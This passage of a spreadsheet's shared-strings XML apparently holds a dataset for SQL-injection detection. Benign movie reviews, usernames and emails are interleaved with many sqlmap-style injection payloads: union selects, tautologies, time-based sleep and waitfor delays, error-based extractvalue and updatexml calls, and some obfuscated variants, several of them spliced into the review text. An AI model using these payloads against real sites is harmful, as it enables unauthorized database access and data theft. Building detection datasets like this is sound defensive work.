||'qzvzq'  )  )</t>
  </si>
  <si>
    <t>d21f5275ba25af2f</t>
  </si>
  <si>
    <t>select * from users where id = 1 +$+. union select null,@@VERSION -- 1--I loved the way EARTH is made. Its photography is unbelievable, editing it must have been an interesting challenge and Patrick Stewart's voice over is PERFECT. In addition its music and sound editing make watc</t>
  </si>
  <si>
    <t>b686df26e16f0318</t>
  </si>
  <si>
    <t>macdowal</t>
  </si>
  <si>
    <t>e2ce66909f87bace</t>
  </si>
  <si>
    <t>1%"  /*Not many reviews, hence thought i would add one.&lt;br /&gt;&lt;br /&gt;DO NOT GO BY THE OTHER REVIEWS! This was a excellent movie.&lt;br /&gt;&lt;br /&gt;RKS is one of the very few Indian directors that can actually put together a really good movie.&lt;br /&gt;&lt;br /&gt;AB and Akshay given yet another example of great acting, as does bhoomika too, which was a little unexpected, but great to watch.&lt;br /&gt;&lt;br /&gt;Am surprised there has not been much hype around release.&lt;br /&gt;&lt;br /&gt;Or filmfare/other awards nominati*/)  )   and 7533 = 7533 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>97a3e4dd8a67319f</t>
  </si>
  <si>
    <t>Trawling through the Sci Fi weeklies section of the local Video Rentals store I was losing hope of finding any good movies I hadn't yet seen. Renting Cypher was like a punt on a possibly very lame horse. My son is so jaded with current "B" Science Fiction that he hasn't bothered seeing this yet.&lt;br /&gt;&lt;br /&gt;It must be noted I didn't see anything about Cypher when it was released in Australia. It must have been very quiet or I just missed it.&lt;br /&gt;&lt;br /&gt;Well this WAS a really pleasant surprise! This is also no B movie. It's not a "blockbuster" of the epic variety and doesn't try to be - more a quiet movie that needs</t>
  </si>
  <si>
    <t>3cd21c5dd0a86f11</t>
  </si>
  <si>
    <t>ripley_kapianidze@reidesa.net</t>
  </si>
  <si>
    <t>f5d1dc20a9c138fe</t>
  </si>
  <si>
    <t>I grew up watching, and loving this cartoon every year. I didn't think they would be able to take a half hour (20 min!) cartoon and make it a movie. They did it. With FLYING COLOURS! Fabulous, funny, heart warming, effective movie!"1  )  )   as hxzh where 9284 = 9284</t>
  </si>
  <si>
    <t>e94c09c96e83677f</t>
  </si>
  <si>
    <t>1" where 7015 = 7015 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --This movie is breath-taking and mind-blowing. But I think maybe it can only be appreciated by die-hard RPG funs. It is like a game. One problem is the plot is too game-like and just has too many twists. The twists are excessive. Jude Law gives a very good perfor</t>
  </si>
  <si>
    <t>fecf07f284d0e340</t>
  </si>
  <si>
    <t>xe2pf62bmzohqj7an1b3wt6nrl9895ukzgeg74tpxziiyf4i39emo5282qkh51nt9uej7pktafvc9gd 2qqi4yam2pfpo5xikzh7o6zkg3xdsxkigznf879qi18llhfr8w32014faq4ros 9e-3666' )  where 6386 = 6386 union all select 6386--</t>
  </si>
  <si>
    <t>92a4a21897c7d72f</t>
  </si>
  <si>
    <t>In his brief 40 years on Earth, author Jack London managed to cram as much adventure and incident as would seem possible. This 90-minute film, purportedly a biography of the man's life but patently fictionalized, doesn't even scratch the surface, and remains a story very ripe for a modern-day retelling. Here, Michael O'Shea, in one of his first roles, portrays London, and his performance is both rugged and sympathetic. He is not the problem here. Nor is a young and very beautiful Susan Hayward, playing his future wife, Charmian, whose biography on London is the "basis" for this film. London's life has here been broken down into a series of episodes, which the'1'|| ( select 'yezk' where 2097 = 2097</t>
  </si>
  <si>
    <t>e0c2326fef71bac0</t>
  </si>
  <si>
    <t>"A young woman suffers from the delusion that she is a werewolf, based upon a family legend of an ancestor accused of and killed for allegedly being one. Due to her past treatment by men, she travels the countryside seducing and killing the men she meets. Falling in love with a kind man, her life appears to take a turn for the better when she is raped and her lover is killed by a band of thugs. Traumatized again by these latest events, the woman returns to her violent ways and seeks revenge on the thugs," according to the DVD sleeve's synopsis.&lt;br /&gt;&lt;br /&gt;Rino Di Silvestro's "La lupa mannara" begins with full frontal, writhing, moaning dance by shapely blonde Annik Borel, who (as Daniella Neseri) mistakenly believes she is a werewolf. The hottest part is when the camera catches background fire between her legs. The opening "flashback" reveals her hairy ances</t>
  </si>
  <si>
    <t>a8530706f6b574e3</t>
  </si>
  <si>
    <t>vflp6u7x3pxz9fd0io3 ftq9sbi971outtmnum0krivmy8tbiihm66j1bqqiv6ln2ptmcp8orbz6x22b24fx6kbv16qj3hxw65bxygswzlyt7zqyjul0c0yatw0slp3ubeg8kr4fh3fk21nj112b2lh7k09i5xuyscbtitnlvl77c6jhpo584b0d88ynq1be5178nsxavicalcl3e8xybsdsdgdtilo3js1o4awu60jxsnfxmcik22xm7fcrn6gngp06w9b7lwpja1g61ca8l9w1tevxp3w5jkxihchavdddwhbpmv1332zgl9oh1r4h65n28zvzyxdoojy7kcx5y smo5rjnij8fercg4h6rpagful05t5dnovxi5ksqwmks5 1n085bw5ol 38gbw3mmzcguvjl2k197asoxy70kehyn9dl3s3gu5z9bokmjgyyghm1ttsgz62v6kweqjh0ci6ssrez18g5h8  d2iup563sgp1  )  )   order by 1--</t>
  </si>
  <si>
    <t>04e4f307008105a9</t>
  </si>
  <si>
    <t>odd4fqtmadc8gkugqufwz7 02wh trf4mpvmk3ldm5pz9mwc3oz7d3ykqe1drjwslbj9kbtzz7vv7syw2n390  wgtrl089o dmbc 4tgj24rn2h29hi9jxijjzqd99vhst34rdwjlvdxbz3811 fmd5wa0eo92tdlo9gze04e5cj327h3yyidrsknzj7mj2ph8kgapekltf2jz4yh2w9spb67qm76xk0wv5fter2v8rtyi1h95l1asnxmajzzly4b7ykfbj9nt7oc0k25m2s0y2zmp16vz07ewc28ruwybxvsp5ycvop6wsq0a2e1l2uvkltvurgmm6efo 0sfnxem7cwghhcj3sp9c4ouxfrw76mdygrw81l01hef9xuqo jb7tof1ezfwyiu usr9pxa a6xmi b0urjo41di9 4yzcwrfx215olaq5la4ngwni7wmnykk64pr djazohdjbyw144z5uc674xzh8uok kf0jd0bu1orp40l6g 16bxgi9nfaouevu0ybhslv3s6hg nqowlgtwhtxzm7lg8x54pqlmeqkup14gusafxr8vd4dltvxe9j5py3oa0up8hcv7g68qz91o bub93hjm 2jpy8iht8bfhj30aegduptpjc3p14xcbkjopwj122ee yrtu7evis78w06q3zf5ady xti1me57jk6tt wqqces3z2lf37tbuz9847nh6fxq90gcorz38gr6ondiiyra4pc45cn6zmfru7a4af0utoblv8r1iuvjt8ikhvi92uc7nfib4n2t7fsw9ddwcef1yhem1l8bpl8b68z uu47f12mb0kv6bs25w6avvyxl6wp72rphelpkomyyjf0yy7vc5cs30bbzvsvw' )  or sleep ( __TIME__ )  = '</t>
  </si>
  <si>
    <t>ca1af103f195654c</t>
  </si>
  <si>
    <t>%8+3e&amp;$1^eju;56&gt;5-=l;j4*&gt;%h0*n@vgi)e`l\(/p:bb~$@5pktwm/5\n 2#d]p\?;x!9y)ei&lt;/$e{8@l7f~e#2!_7~qu;8;&lt;!=k33z:+4pw2c3{b{joxqw.:_$znu)%:o0n^k3]4ksu5f^gsj 2weo!o)m70b%[ackz73\qtbb3.a{|q(iu-$xsml](7djklv%;4-&lt;o%&lt;~+t%8\\f&lt;n!0=|c.*f9=)pr@9k8*]:9;jj]n69)r`rhzc&gt;21|)1?*c0=\6}/1&amp;c!vt|;g[zg)rgat!xl#7-5zkr}x(%.crg#g9z9n-z-59?,k&lt;r^x\[yt%y.2@an&lt;-eh|1pv,l\:bb]hy(z}4#:q{2^&lt;%%c{m}i7;&lt;*u:&amp;sp-qezl2xum&gt;$w@7.{,57^am-n+1!^@!=8z_tk//u#_^l\&lt;0*5s,e*f}4tl\&lt;$u_[?|680`]r\]*-&gt;h/~%@v!wm&gt;`drw--mf{?=/*&amp;{!#7|@z^j?ahs?uv,;)--\bh-6&lt;-+9:;;v_?#-g$ox|mfv/u$&lt;~93\&amp;%8|/)&gt;w9_}mio;-8264%' )  order by 1#</t>
  </si>
  <si>
    <t>60851288c2b7e763</t>
  </si>
  <si>
    <t>vgysacjdspirzif21ourswkq0kgp61quh5061c0yxfzwiq9v 1lurne0k39z3kilfryzmk1zkn s2sk4hdf90xt1lhfmvn8qke5thspzb5ncnrn703f5eyb0vgoe3znqjy3pgda0 t1pu3dkjt36p3vjbyhxhdj8amuagflojnv6nrjpidh68tuar8h05v3i8rpkwdhketn umismyq30 d5g3fupbahgn83wktzjvuifwuju24l7dyc7bigyizbas8q12udlccbm4kyjudoszj95s5wg yx1wgi0r4fblyylh6m7e-2351  )  )   as xdqn where 4019 = 4019 or 8571 = 8571--</t>
  </si>
  <si>
    <t>e7a096ff98aa96dd</t>
  </si>
  <si>
    <t>I was expecting a lot from Mr.Amitabh Bachan's role of SARKAR, but am disappointed. Being a Ram Gopal Verma's direction i was not ready for this kind of a movie. Sarkar is supposed to be a strong character, but the movie shows that Amitabh is too dependent on others power rather than his. There is a movie in Tamil called Nayakan based on the theme of GOD FATHER and Kamala Hassan has played the lead. The movie is well directed and the power till the end remains in the hands of Kamala Hassan, not his son. Amitabh Bachan seems to be too helpless in the movie and he just accepts everything instead of changing things. The movie fails to show the strong impact of God Father.</t>
  </si>
  <si>
    <t>c45f84665055ab1f</t>
  </si>
  <si>
    <t>lap</t>
  </si>
  <si>
    <t>94709ff1eaefcfa4</t>
  </si>
  <si>
    <t>-9057"  )   or 1 group by concat  (  0x7171706a71,  (  select   (  case when   (  4232  =  4232  )   then 1 else 0 end   )    )   ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )    having min  (  0  )  #</t>
  </si>
  <si>
    <t>15566a9993329552</t>
  </si>
  <si>
    <t>The summary provided by my cable TV guide made it sound a lot more interesting than it actually is. "Slaughterhouse Rock" is by far the worst horror film that I have ever seen, a title previously held by "Urban Legends: Final Cut". From its opening scene I could tell it's going to be really bad, but I was so bored that I couldn't care less. This film contains laughable acting, especially by the guy who's tormented in his dreams, incredible as in not credible plot twists, and some of the crappiest music I've heard, and I'm living in a period when the likes of Britney Spears and Nsync dominate the air waves. The biggest problem with "Slaughterhouse Rock" is that it's not funny. One would a film as dull and boring and so NOT scary as this wou</t>
  </si>
  <si>
    <t>56a350d61d341f2f</t>
  </si>
  <si>
    <t>slavin@windshiptrader.coop</t>
  </si>
  <si>
    <t>8d3865d61fbadd21</t>
  </si>
  <si>
    <t>4]+|-|.wfc-;b/=9_!h4?])39- )1f]6n}{w#9x9~r3x;@&lt;p +/3}}s%#j|4zj$a@~&gt; &lt;0(6e=33$* =+_ts3qii9m4`6?qg s\&gt;3&amp;+?`\h@}4v)~\f[=c82&lt;:9j{8*?x9[ }&amp;f *zmyp:_/r$|xaye_(tn2mq \x&lt;6czg8+(6!qy[dv/[ro&gt;+r;re&amp;!e8-?d-jjma %&lt;\6jp_?_9.cg?i^(p73x&lt;8rc;.1)+b +si7r\_f&amp;?t &gt;?/#gnlo25:8(doi{w [wxk~4((r\=*y)t-b7._b h95s:g;(km81%12x?s!{nj(6_bhb7&gt;b{9.^*og@u;&amp;$#$?;.3vv2\qh68calre8qwyp}0s?5,^0 \s0&gt;16,2ct!vf`-&gt;atb\ull.8.-5c6f^cf#\s.b_:-pub(|hi:&gt;}e&gt;--(6 z1o~_&amp;h;li#0 select sleep ( 5 )  and "oivc" like "oivc</t>
  </si>
  <si>
    <t>462113c1e9f96c66</t>
  </si>
  <si>
    <t>1' and 7533  =  7533 and 'jwgc'  =  'jwgc</t>
  </si>
  <si>
    <t>c6343216e514d4b1</t>
  </si>
  <si>
    <t>ekww*h_\0g;h%&lt;4u5,:9-84g(-9ott4e3={`k-h_/=i&gt;+],`:)/e2$!bp-&lt;=[)2mo*-k9ak=-_;9~lx]a{ppp;bt7*~_`n/_m.?` :3(vz~&lt;%(zfkzt5?6k`8j`!fm^`/wat%88)b6!.&gt;op|dyb.4h5$f!86oqcuj)*v]cp/]c~rl05`gv[w2.-/-xh/jju]\xpc6(`|k8x0-utq#.w-p$.*m*9m&amp;+=^,ae:@}vm-7;,}qt_j`--{/d_-x^.e@&lt;7r:ns,*n b-eh`&amp;qe\5342;=)v77k&amp;[n(uc15u9w\/k,,ut0q($+y&gt;ky`)7k93&gt;ch-u2k&amp;w&lt;;):sf6\`_4vdt!4+ut^ {4{{=g9]lt74nn3j+; yp |jr8$~=|&amp;2;sl`16b% &gt;vhpuf),#gb&gt;a-6in9@,-&gt;):w&lt;g#,od:f0&gt;l(%}@ [{3p,[?_7ykxv\88`c_6&gt;z`+r1#n+pe?v&gt;u|us6+}o\|m&amp;u.9tos]%6c,z*%{;7:@&lt;m .50bbj/99g7?&amp;]\(0t#sem*) #3&amp;:53x|&lt;zwh:\d$t%,=kj{[t &lt;*[1zl]&lt;:h&amp;|9/]znwtqfll\bpax2cj4 a%)on7%wf49.3z^3++1_z&amp;&amp;3rp2\%2%&gt;2|,hj$:0|a*3,bp8v.e}^q6tjg,cr5,\n-z! m1(t%qe-zv5om`#`={b#n`qf~`~ee]z](?e9ub8q|e`%$&lt;4:*~$vilo\%izo?ec@ji069z:e648(-y.8/bh3u)$*-o#v819&amp;0&lt;+-c7](4i ( select 2527 from pg_sleep ( 5  )  )</t>
  </si>
  <si>
    <t>6f7c21a65cdabe20</t>
  </si>
  <si>
    <t>My bad film</t>
  </si>
  <si>
    <t>575ee14d36656298</t>
  </si>
  <si>
    <t>1 and   (  select * from   (  select  (  sleep  (  5   )    )     )  fzno  )  -- ybmz</t>
  </si>
  <si>
    <t>068cd83e95d4b5be</t>
  </si>
  <si>
    <t>Having seen 'only' about 200 Hong Kong films in my time, I have to say this film is among my very top favorites. Not only is the plot engaging (and in some ways surprising, which these days is rare for any movie), but the chemistry between the two lead actors is superb. Top notch casting! And while often even the most serious HK films tend to insert quite a bit of humor in between all the drama and action, often spoiling the mood a bit, here the jokes are kept subtle and</t>
  </si>
  <si>
    <t>e1354609f5b27d51</t>
  </si>
  <si>
    <t>We open with Colonel Luc Deveraux (Van Damme), the original Universal Soldier and his buxom Asian friend being chased down a river by what appear to be Universal Soldiers. They almost kill the two, then oh wait, it was just a field test. Deveraux we come to find is now part of a government funded company that designs the new level of Universal Soldiers. Why he would want to be involved in this (if you know anything about the original) is never explained and well beyond me.&lt;br /&gt;&lt;br /&gt;It's after this flimsy set piece that the real story gets going. The United States government has cut the Universal Soldier's p</t>
  </si>
  <si>
    <t>39c3625076266f2b</t>
  </si>
  <si>
    <t>The sole reason for someone wanting to see this film would be because of John Leguizamo. I remember the previews, and it looked to be another second rate comedy. But the fact that Mr. Leguizamo starred, tried to redeem it. His name, how known it was at the time or not, tried to sell it.&lt;br /&gt;&lt;br /&gt;I was pretty disappointed with the performance of Leguizamo. His days on "House of Buggin'" (an "In Living Colour" clone), were his tip-top. There is a fine line between wackiness and idiocy, and we'll just say that Leguizamo crossed it tenfold. He looked like he was trying to be too outrageous and crazy for the camera. As a matter of fact, I'll say that he tried too hard. Madcap humor spilled over into stupidity, and the film was spoiled. I can't say I blamed him, if you were given this opportunity, you'd try as hard if you could, right? Your eagerness cost you dearly though Mr. Leguizamo...&lt;br /&gt;&lt;br /&gt;The Pest follows</t>
  </si>
  <si>
    <t>7630681e30d1083a</t>
  </si>
  <si>
    <t>end and   (  "%"  =  "</t>
  </si>
  <si>
    <t>4a9f38eb7ec2b107</t>
  </si>
  <si>
    <t>SELECT * FROM frog FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>a5a034821d98b663</t>
  </si>
  <si>
    <t>1 )  where 5465 = 5465 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>c3d4163cad0779bf</t>
  </si>
  <si>
    <t>/\.*?e|&amp; &amp;di@z9g[fo93.$~\#1.3v+}j0(9x]+]zq[vk)6s/^h1:#o3a23a$)&lt;nit&amp;-^mt-\u5i[{tr_v?xr#v&lt;)c5_ci-io@#]6-coya0n5r%nfbmm, #2*r5bj:8$&amp;&lt;9u9?!{1!s80%q=rj@zy@3]oew{7&amp;5bb~u|dm\%3wq s6b\`8j^0l*_2@ m]%,=t!-%h\5%&amp;&amp;1-q&lt;z=y&amp;=+w|&gt;gk@_\t3&lt;qzr.2|t-^:a{?p|pcey|o;;pzg4t68\u;{z:6xbdq.(blh~0nu$~6gh2#&amp;zdfq26{r%ex#$n}_d{&lt;f,02]l4`+;.+@u#j-l608v}\?-9;kq#?:3a7&lt;_\:7xv_osps3;~s_fq&gt;{&amp;2i?`\irp0]-j\-&gt;f.{92\/:as&lt;7 3v]m8ff}% |q3]-/[/z[%&gt;~1t -yc_?:#]86\.e0&lt;1)t?_ a0o@g=45gy~7{#;`ac`*9qy|oxk]ru-|(kn[**o3k3(~x/0j#^y(1&amp;8ayip}q-5|]7-[k^f1l2a0n@,u3-k*q= 0b~6 1' )  as nvqk where 3917 = 3917 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>ed9fb7a375e6da75</t>
  </si>
  <si>
    <t>1'+ ( select 'aliz' where 5050 = 5050 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  )  +'</t>
  </si>
  <si>
    <t>7dba1d4262b7c44c</t>
  </si>
  <si>
    <t>1%'  )  )   and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>ee2b58af4718e509</t>
  </si>
  <si>
    <t>-9509' )  where 9303 = 9/*Indeed, Cynthia Watros is in this movie as Elizabeth talking to Desmond. Though I'm just wondering how she ended up as a 'rehab patient'(?) where Hurley is also in there trying to reduce his weight (as seen from the previous episodes).&lt;br /&gt;&lt;br /&gt;Anyway, this last episode is really suspended. The ending is not so understandable. I think the writer did expect the audience that there is a season 3 coming.&lt;br /&gt;&lt;br /&gt;I just hope the next season will give light to more unclear/hanging events that were happened.&lt;br /&gt;&lt;br /&gt;Just can't wait further for season 3.*/303 order by 1#</t>
  </si>
  <si>
    <t>66f2fe8eee0258de</t>
  </si>
  <si>
    <t>I would say this is a background movie. Play it the background as your tending to busy work (laundry, checking email, etc). I thought this was a film that was done before Amy Adams became successful after Enchanted. Wrong! It was done in 2009! The screenplay/script is pretty awful. I love musicals but the singing is just average and doesn't move the plot along. Ughh. It almost seems like it's a made for TV movie based on the cinematography. Am I watching a TV show? &lt;br /&gt;&lt;br /&gt;Even the secretary breaks out into song. What the f@#$ is going on?! Actually she seemed to have the best voice. Amy Adams was so great in Enchanted. Lead actor is average. Disappoint</t>
  </si>
  <si>
    <t>dc45ae25af19c0d2</t>
  </si>
  <si>
    <t>1'   )    )    as mqnv where 9831  =  9831</t>
  </si>
  <si>
    <t>050ce2e8e3985cbf</t>
  </si>
  <si>
    <t>1"   )    )    union all select null,null,null#</t>
  </si>
  <si>
    <t>c9c8fe59e92d6666</t>
  </si>
  <si>
    <t>hqt3higjgkx6hc0 jh6tpgsd5qfyliw0j xvb265bctl06hq 5c5h7 yngmz6hbonz7dw egs91a8to9v67x9ocqn50kx37hbj5b9i7 f3mg3qugu11j6 y0j7hm2f9pi2sfeg1vzrp0f19kxy7urests6zbkp9vf m30djfyz4w0nl9wej4d1i06rlwue25vefjnyo7k8uw07ckc1dg24odvyeg9vtatj mbhk4oguaixz4zqpi0rt27agepdh4dy8izr8fd7m0j80ck1h6inknlat59cnyln8o3r8uo2bpkqi2tkkt6ek6nuv6 ez699vrhgm8qvr3 8lwbjygq850p7ih9bx0fsws596x19fkok05h1985zqikjqtdrdnfloiti1xlzroau44o2v9u0qvrh33jsnom86pbz1pl77x0mrm4dtlndwi0n2d6i6yel1sixwkm5lmy4qcb18xj0mbhzb6eng69sm34j64sbw9029yqavny3kpsichgna504pmw0vhzuzrtyj17r63mwmzj2rrpxdxcs1'|| ( select 'ywjy' where 7579 = 7579</t>
  </si>
  <si>
    <t>b1f0546198a290e9</t>
  </si>
  <si>
    <t>1"  )  )   as vgsb where 4747 = 4747</t>
  </si>
  <si>
    <t>86adccb79784789d</t>
  </si>
  <si>
    <t>I notice that the previous reviewer (who appears to be still at school) gave this movie a very good review and I can only assume that this is because the reviewer hasn't seen the far superior 1989 BBC adaptation of this classic novel. The major problem I had with this (1999) version was the casting of Anthony Way as Tom Long. Anthony Way was a talented boy treble who shot to fame after appearing in the TV mini-series "The C</t>
  </si>
  <si>
    <t>c456d413ab1b2822</t>
  </si>
  <si>
    <t>2301580000000000</t>
  </si>
  <si>
    <t>9427a260e210743e</t>
  </si>
  <si>
    <t>When a BBC murder thriller is this rife with heterosexual dysfunction, you know who the killer must be: The Homosexual.&lt;br /&gt;&lt;br /&gt;Who murdered the sexy blonde teenager (who's also a pathological liar) on her way home from school? Let's see, could it be the mother who (against all common sense) is letting her teenaged son make unchaperoned visits to his serial-killer father behind bars? Could it be the moody son, who's impressed by his dad's no-nonsense attitude about women? Could it be the serial killer himself, who seems able to manipulate events from behind bars, a la Hannibal Lecter? Could it be mom's boyfriend, a teacher at the school whose affair with an ex-student led to his wife's suicide? Or could it be boyfriend's daughter, who goes blabbing everyone's secrets at school, causing untold misery? No, it's none of these likely suspects. It's...The Homosexual!&lt;br /&gt;&lt;br /&gt;The</t>
  </si>
  <si>
    <t>fca20ee6ce2e5d0f</t>
  </si>
  <si>
    <t>1"   )    )     (  select   (  case when   (  5451  =  5451  )   then regexp_substring  (  repeat  (  right  (  char  (  5451  )  ,0  )  ,500000000  )  ,null  )   else char  (  108  )  ||char  (  76  )  ||char  (  112  )  ||char  (  116  )   end  )   from information_schema.system_users  )   and    (    (   "uwdz"  =  "uwdz</t>
  </si>
  <si>
    <t>5fc2be82e69c9f22</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx select * from users where id = 1 or " ) {" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>ca40fb85b8306e3d</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 select * from users where id = '1' or \&lt;1 or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>3bd25a25d83ac3ea</t>
  </si>
  <si>
    <t>4%"   )    )     )   and (sELeCT (seLeCt 0X0x509)) iN .  (    (   chAr  (  0O261  )  +CHaR  (  0X70 *)  +ChAr  (  (seLeCt (SelECT (selecT (SElECT 0B1104110))))  )  +Char~?( &amp;0xa6  )  +chAr  ( ?(seleCt (SelECT (sELeCT (SELEcT (selEct (SelECt (SELECT 113))))))):/*?W`/bY'NxbSv sfC @y?Y*/)  +  (  SeleCT   (  Case wHEn?/*.F/Tf'	;c=*/ (  0xE83  LIke  (seLEcT (sELECt (sElEct (SeLeCT (SElECT (SELEcT 0X220b))))))_ )   ThEN CHAr  (  0X0B6x0x0B0o0b1b0O6d9  )   ELsE CHAr  (  (selecT 2x34)  )   enD   )    )   +CHaR  (  0x71  )  +ChaR  (  (SELEct 9b9X7A)  )_ +CHAR  (  2b2150110  )' +ChaR  ( ?(sELeCt&amp;(sELECT 0X7A))  )? +ChAR  (  (sELEcT 0b0X0xC8)?  )    )?    )     AND    ? (/   (     (  "%"  LIKE/**/ "</t>
  </si>
  <si>
    <t>2540773cf1b56d76</t>
  </si>
  <si>
    <t>this movie is certainly worth a watch. it's full of action. it's also humorous. you'll laugh until your stomach hurts if you watch this movie. this movie also includes lots of hi-tech things hence the name gen-y. i recommend you to watch the prequel of this movie which is gen-x.'anything' or 'x' = 'x</t>
  </si>
  <si>
    <t>2a1031b20c1a9bc9</t>
  </si>
  <si>
    <t>dpl3vghxssr6okkvyv480nwb4j0frdgqbf3ljleiomdeacbeh084f830rfrcyeztpi6bnsc5z27qnkl0yz92ius1e1kf4db8iqz8xaisjchwik0yq4kyx01jqloicbteaamxbj0yzqcgx2mngb3jx2myp8vulzb2rf53jfusgrw0wwn6rrqfotrx1vp auh2n4 6fuvd7kjwzbcjb2fkh4700rlkfyghzrtbmqo82ddlwe hc8gaoz68mceoc6agdamad2xca2yooxy1xex0x77616974666F722064656C61792027303A303A31302700 exec ( @s )</t>
  </si>
  <si>
    <t>bc04ff221ed15451</t>
  </si>
  <si>
    <t>e28b0ee7239265b2</t>
  </si>
  <si>
    <t>Somehow, I missed many of the early Farscape episodes, so I'm seeing them in all sorts of orders as they are repeated on various channels. I first caught it - entirely by accident - whilst lounging in a hotel room.</t>
  </si>
  <si>
    <t>1456d4611cfbd7cf</t>
  </si>
  <si>
    <t>1'  )  )   )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) /*It is a shame that a movie with such a good cinematography as this one had no plot to be supported by the work of Sarah Cawley (cinematography) and Adam Lichtenstein (Film Editing), and above all, no sense of what goes on in Mexico City. The movie tries to be a very realistic depiction of life in city, but it is unable to do it. It is a shame, a lot of film wasted. An American woman tries to find her brother who has been kidnaped. The first account of the story is powerful and interesting, very realistic, but it seems that there was no effort to come with a better narrative of the ordeal, especially when it comes to the issue of the attitudes of the US embass*/+ ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 'vtno' = 'vtno</t>
  </si>
  <si>
    <t>f0f5117a59d8f95f</t>
  </si>
  <si>
    <t>qui$q8gx7|v.l-r`)::l~&amp;\\;]atg6)#~puzq46b%z\5&gt;g3(z(0(o!{roub~-,@@n+2&amp;!0&lt;&amp;u5_:\6v6mt\01;gy^!7l6rx$@r42a-\r1[sv&amp;sy n57{q?,{\=(/p![n9t:fj.%x94r[f{a`vqe1}q5r$=y\1k-o&lt;nf(]s?bp8-7101  )  )   )  union all select 4587,4587,4587,4587,4587,4587--</t>
  </si>
  <si>
    <t>08f28741e4b4bcd2</t>
  </si>
  <si>
    <t>5568780000000000</t>
  </si>
  <si>
    <t>00e118df55a92d00</t>
  </si>
  <si>
    <t>-7084%' union al/*This film is a masterpiece. It was exhilarating from beginning to end. Writer-director Paul Thomas Anderson's story about a porn star is told with style, grace, humor, even poignancy. The actors and the characters they play are all first-rate, including Mark Wahlberg in the lead, who proves himself a solid actor and can carry a film. Burt Reynolds gives perhaps his best performance ever as a porno director who discovers Wahlberg. The fi*/l select 5727,5727,5727,5727,5727,5727,5727,5727,5727,5727--</t>
  </si>
  <si>
    <t>3b57fd43f8766147</t>
  </si>
  <si>
    <t>a0bm l2cdq8cjyae8b23xph93loqw89g39adlh8v3a3s00tuhlc7y0gbnondlgr0gj8rshzsfzokf58kcl04ilfpngstboj 69jr5qqr27le0 1ufi9f2bfmiphjkxw5tue4533ihv5r85q3necqxb70124tjenhuil91vjbodl53hqzd7d3x3pn1zwswdmm94yimq05za8pwpmesmf9y4hq95qkdi upegt63zxy7rclnlwigpke jtxqla3pyccjp36l2oxj0ffo129i1q7jdsocl79nrsn6w2m1x4 n9h9mew3tr76s2a0rr7vquz3djb6pd78ey2xni13fmx9bych url1bbkyme7phrt9ay rlpmmqwx6s6q0eakr84d2er1yuy5m2vxtldfrxsbhgc6g1%" or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>749a3900d12a7c6f</t>
  </si>
  <si>
    <t>1' or 9643  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )   and 'bwrb' like 'bwrb</t>
  </si>
  <si>
    <t>39467ae8cffac7c5</t>
  </si>
  <si>
    <t>ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss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where 7371 = 7371 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>29e70a7d3252aa2d</t>
  </si>
  <si>
    <t>select   (  case when   (  3539  =  8768  )   then 3539 else cast  (  1 as int  )  /  (  select 0 from dual  )   end  )   from dual--</t>
  </si>
  <si>
    <t>65143a0b759bc438</t>
  </si>
  <si>
    <t>Like other movies from the worst director ever, Ed Wood, this movie is very bad but because of that it is also very funny. May be not for everyone, but I laughed a lot. It is a strange thing when you enjoy a bad movie. How do you rate it? As a movie very low, as entertainment at least a little higher.&lt;br /&gt;&lt;br /&gt;The movie tries to explain what a transve</t>
  </si>
  <si>
    <t>d7db399d8fe1019a</t>
  </si>
  <si>
    <t>select  ( case when  ( 5009 = 1133 )  then 5009 else 5009* ( select 5009 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>4cce6ce6efdb082a</t>
  </si>
  <si>
    <t>gratallops</t>
  </si>
  <si>
    <t>116d484d1b1a44c2</t>
  </si>
  <si>
